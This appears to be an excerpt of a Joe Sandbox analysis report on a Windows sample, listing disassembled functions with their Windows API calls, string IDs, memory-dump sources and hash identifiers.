                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __i64tow__itow__swprintf
                                                          • String ID: %.15g$0x%p$False$True
                                                          • API String ID: 421087845-2263619337
                                                          • Opcode ID: 66713cffe6d7c3082c16ed6853a74138621df82fc2cb80312a39d0d9e97c63ec
                                                          • Instruction ID: 1fd0b1a2e823c436ea7159f778d48d45f69a29e36f11531ce35c78e5a4b249b7
                                                          • Opcode Fuzzy Hash: 66713cffe6d7c3082c16ed6853a74138621df82fc2cb80312a39d0d9e97c63ec
                                                          • Instruction Fuzzy Hash: 4F41C231514209AFDB3A9B34D842F7B77E8FF45310F20846EE549DF296EB31A9418B51
                                                          Function 003C7184 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003C719C
                                                          • CreateMenu.USER32 ref: 003C71B7
                                                          • SetMenu.USER32(?,00000000), ref: 003C71C6
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C7253
                                                          • IsMenu.USER32(?), ref: 003C7269
                                                          • CreatePopupMenu.USER32 ref: 003C7273
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003C72A0
                                                          • DrawMenuBar.USER32 ref: 003C72A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                          • String ID: 0$F
                                                          • API String ID: 176399719-3044882817
                                                          • Opcode ID: 50983a2291c7e35544f26fb3ec67cab08495a2e12d17155e4a81ade3d1246028
                                                          • Instruction ID: ba7959b3b4aededd436cf4ee9b77cf0b7d318e9e9f734cfce3a2baa649f3564f
                                                          • Opcode Fuzzy Hash: 50983a2291c7e35544f26fb3ec67cab08495a2e12d17155e4a81ade3d1246028
                                                          • Instruction Fuzzy Hash: 91411275A01209AFDB12DF65D888F9A7BB9FB49300F154529FD0AA7360DB31AD10CFA0
                                                          Function 003C74ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003C7590
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 003C7597
                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003C75AA
                                                          • SelectObject.GDI32(00000000,00000000), ref: 003C75B2
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 003C75BD
                                                          • DeleteDC.GDI32(00000000), ref: 003C75C6
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 003C75D0
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003C75E4
                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003C75F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                          • String ID: static
                                                          • API String ID: 2559357485-2160076837
                                                          • Opcode ID: 9ee6816f3abf841897eda4855e8c3a5d377cfe59245c2cdaa1c568c3758155bb
                                                          • Instruction ID: 8f1f5dc70d5af9605ff96184ce2780a82422c5e820bde8dd123f36b11bd7b8f9
                                                          • Opcode Fuzzy Hash: 9ee6816f3abf841897eda4855e8c3a5d377cfe59245c2cdaa1c568c3758155bb
                                                          • Instruction Fuzzy Hash: D8314772104219AFDB129F65DC09FEA3B6EEF0A760F110228FA15E61A0C735E821DB64
                                                          Function 00366F80 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 00366FBB
                                                            • Part of subcall function 00368CA8: __getptd_noexit.LIBCMT ref: 00368CA8
                                                          • __gmtime64_s.LIBCMT ref: 00367054
                                                          • __gmtime64_s.LIBCMT ref: 0036708A
                                                          • __gmtime64_s.LIBCMT ref: 003670A7
                                                          • __allrem.LIBCMT ref: 003670FD
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00367119
                                                          • __allrem.LIBCMT ref: 00367130
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0036714E
                                                          • __allrem.LIBCMT ref: 00367165
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00367183
                                                          • __invoke_watson.LIBCMT ref: 003671F4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                          • String ID:
                                                          • API String ID: 384356119-0
                                                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                          • Instruction ID: 8c4c12e6a381337a9a6a02d3e8dd669a83124bfaaab631ae1950cc826e23815d
                                                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                          • Instruction Fuzzy Hash: E7713B71A00717ABE7269F38CC42B5AB3A8AF05364F11C23AF414DF685E774E9408BD0
                                                          Function 003A281F Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003A283A
                                                          • GetMenuItemInfoW.USER32(00405890,000000FF,00000000,00000030), ref: 003A289B
                                                          • SetMenuItemInfoW.USER32(00405890,00000004,00000000,00000030), ref: 003A28D1
                                                          • Sleep.KERNEL32(000001F4), ref: 003A28E3
                                                          • GetMenuItemCount.USER32(?), ref: 003A2927
                                                          • GetMenuItemID.USER32(?,00000000), ref: 003A2943
                                                          • GetMenuItemID.USER32(?,-00000001), ref: 003A296D
                                                          • GetMenuItemID.USER32(?,?), ref: 003A29B2
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003A29F8
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A2A0C
                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A2A2D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                          • String ID:
                                                          • API String ID: 4176008265-0
                                                          • Opcode ID: 049b870fa03a3d0375aaec172e675da0a3dfdc6f4a5b9f7ddc0c3078c8cfbb52
                                                          • Instruction ID: d1c4c3ada7788e5bd2ee6ed7de780cd415cb29e92c287fa47dbab77b0e0086ef
                                                          • Opcode Fuzzy Hash: 049b870fa03a3d0375aaec172e675da0a3dfdc6f4a5b9f7ddc0c3078c8cfbb52
                                                          • Instruction Fuzzy Hash: E5617C70900249AFDB22CF68CD88EAF7BB9EF46704F150069F842A7251DB31AD15DB61
                                                          Function 003C6F55 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003C6FD7
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003C6FDA
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003C6FFE
                                                          • _memset.LIBCMT ref: 003C700F
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003C7021
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003C7099
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow_memset
                                                          • String ID:
                                                          • API String ID: 830647256-0
                                                          • Opcode ID: 3f9c8998ef1eedfd9a5f37cc5b06e2b8b413899b0c9b71688d326e6627d0c236
                                                          • Instruction ID: de0be98dbbf591e50169bb4b1470949af0db867c4196378d173fbd4bad9db61a
                                                          • Opcode Fuzzy Hash: 3f9c8998ef1eedfd9a5f37cc5b06e2b8b413899b0c9b71688d326e6627d0c236
                                                          • Instruction Fuzzy Hash: F7614775A00208AFDB12DFA4CD81EEE77B8EB09710F14416AFA15EB2A1C770AD51DF64
                                                          Function 00396EEE Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00396F15
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00396F6E
                                                          • VariantInit.OLEAUT32(?), ref: 00396F80
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00396FA0
                                                          • VariantCopy.OLEAUT32(?,?), ref: 00396FF3
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00397007
                                                          • VariantClear.OLEAUT32(?), ref: 0039701C
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00397029
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00397032
                                                          • VariantClear.OLEAUT32(?), ref: 00397044
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0039704F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: cbd5f726719dc6c75de8aa1f672a3b1ba22f1377831a00527b19434aa98515da
                                                          • Instruction ID: 4b07c52cc14a5d6c39b8084520ce5fb0fc393e50feb71ac6e65fc8f39fa1e6b1
                                                          • Opcode Fuzzy Hash: cbd5f726719dc6c75de8aa1f672a3b1ba22f1377831a00527b19434aa98515da
                                                          • Instruction Fuzzy Hash: 8F416E75A002199FCF06DFA5D848DAEBBB9EF48350F008069E956EB261CB30B945CB90
                                                          Function 003B84D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • CoInitialize.OLE32 ref: 003B8518
                                                          • CoUninitialize.OLE32 ref: 003B8523
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,003D2BEC,?), ref: 003B8583
                                                          • IIDFromString.OLE32(?,?), ref: 003B85F6
                                                          • VariantInit.OLEAUT32(?), ref: 003B8690
                                                          • VariantClear.OLEAUT32(?), ref: 003B86F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 834269672-1287834457
                                                          • Opcode ID: 32e4645de2492b22ddcc43defad91feb82e5a7ca98ee2872138e36e949ef91bb
                                                          • Instruction ID: dafdeaf6199de4b0755100656bca316d1b3a1e3b17663232f2bd6f5546731577
                                                          • Opcode Fuzzy Hash: 32e4645de2492b22ddcc43defad91feb82e5a7ca98ee2872138e36e949ef91bb
                                                          • Instruction Fuzzy Hash: F06182706083119FD712DF24C845FABB7ECAF45718F04481AFA859BA91DB70ED44CB92
                                                          Function 003B5848 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 003B58A9
                                                          • inet_addr.WSOCK32(?,?,?), ref: 003B58EE
                                                          • gethostbyname.WSOCK32(?), ref: 003B58FA
                                                          • IcmpCreateFile.IPHLPAPI ref: 003B5908
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003B5978
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003B598E
                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003B5A03
                                                          • WSACleanup.WSOCK32 ref: 003B5A09
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: 1d2cd02923ce18f4023cf9983763eee8a645283bb87198f9e69df235a818d7cb
                                                          • Instruction ID: efb7c1af3dc9ff6228c743846df9e96e1a34ed6c39519fe8e010be21fe5b9420
                                                          • Opcode Fuzzy Hash: 1d2cd02923ce18f4023cf9983763eee8a645283bb87198f9e69df235a818d7cb
                                                          • Instruction Fuzzy Hash: BF516E31604700DFDB12AF24CC86B6AB7E8EF48724F15452AFA96DB6A1DB70ED00DB51
                                                          Function 003AB54F Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003AB55C
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003AB5D2
                                                          • GetLastError.KERNEL32 ref: 003AB5DC
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 003AB649
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 504bcb07564cc003fe1dc4ec34178577acf36f8154331991c50d4c887018b56d
                                                          • Instruction ID: d6d1e55ab04d2bddf50a69222d3d75c083bcc4f1fb768c0c85c6afe8625f8477
                                                          • Opcode Fuzzy Hash: 504bcb07564cc003fe1dc4ec34178577acf36f8154331991c50d4c887018b56d
                                                          • Instruction Fuzzy Hash: EF318175A002099FDB16DFA4C885EFEB7B8EF06300F154125F501DB2A2DB71AD01CB90
                                                          Function 00399251 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 0039AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0039AEC7
                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003992D6
                                                          • GetDlgCtrlID.USER32 ref: 003992E1
                                                          • GetParent.USER32 ref: 003992FD
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00399300
                                                          • GetDlgCtrlID.USER32(?), ref: 00399309
                                                          • GetParent.USER32(?), ref: 00399325
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00399328
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: 00f400c9db1c5d0a1e65667b6ce54dca683b6e61da9e933da8e07c28c6d1e57a
                                                          • Instruction ID: d4978a39d4bf7b428c532e41ae34ad99793893e5bd5fd2a6d16e03e9c72b1a1c
                                                          • Opcode Fuzzy Hash: 00f400c9db1c5d0a1e65667b6ce54dca683b6e61da9e933da8e07c28c6d1e57a
                                                          • Instruction Fuzzy Hash: F721C475D00108BFDF06AB64CC85EFDBBA9EF59310F10015AF5619B2E1DB756819DB20
                                                          Function 0039933C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 0039AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0039AEC7
                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003993BF
                                                          • GetDlgCtrlID.USER32 ref: 003993CA
                                                          • GetParent.USER32 ref: 003993E6
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 003993E9
                                                          • GetDlgCtrlID.USER32(?), ref: 003993F2
                                                          • GetParent.USER32(?), ref: 0039940E
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00399411
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: 1512d0340ba542e7f95da64050155482c252a2ef08cad87ea4c654e776185b47
                                                          • Instruction ID: 7494c93d67146129e455b07e69315d541ca170d94f2fe05ccf00c7486336957c
                                                          • Opcode Fuzzy Hash: 1512d0340ba542e7f95da64050155482c252a2ef08cad87ea4c654e776185b47
                                                          • Instruction Fuzzy Hash: 3321B6759001047FDF02ABA5CC85EFEBBB9EF54300F10015AF9519B2A1DB756929DB20
                                                          Function 00399425 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetParent.USER32 ref: 00399431
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00399446
                                                          • _wcscmp.LIBCMT ref: 00399458
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003994D3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1704125052-3381328864
                                                          • Opcode ID: d3000b91585d63c5668184f984be2e894b8a4b0356d0d16b00ed2bccc866c40b
                                                          • Instruction ID: e642a12ceecfb4870927b4ad47071e6f69b9114999f320c31c13e4723603e9f7
                                                          • Opcode Fuzzy Hash: d3000b91585d63c5668184f984be2e894b8a4b0356d0d16b00ed2bccc866c40b
                                                          • Instruction Fuzzy Hash: 5811CA7724C307BEFE136629AC0AEE7779C9F15720F20802BFA05E54E1FB9168524654
                                                          Function 003A7A39 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 003A7B15
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ArraySafeVartype
                                                          • String ID:
                                                          • API String ID: 1725837607-0
                                                          • Opcode ID: 3680d9d8a9934cda39cba6ff982ab085eb1d160f65e31ad5e72e83356631a0c5
                                                          • Instruction ID: 18b95e75450c319f8e7a704417ca801b4bccd370ecf30ff529f2533c8939c7cd
                                                          • Opcode Fuzzy Hash: 3680d9d8a9934cda39cba6ff982ab085eb1d160f65e31ad5e72e83356631a0c5
                                                          • Instruction Fuzzy Hash: ACB18E7190421A9FDB12DFA4CCC5BBEB7B9EF0A321F254469E500EB291D734E941CBA0
                                                          Function 003A14FF Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 003A1521
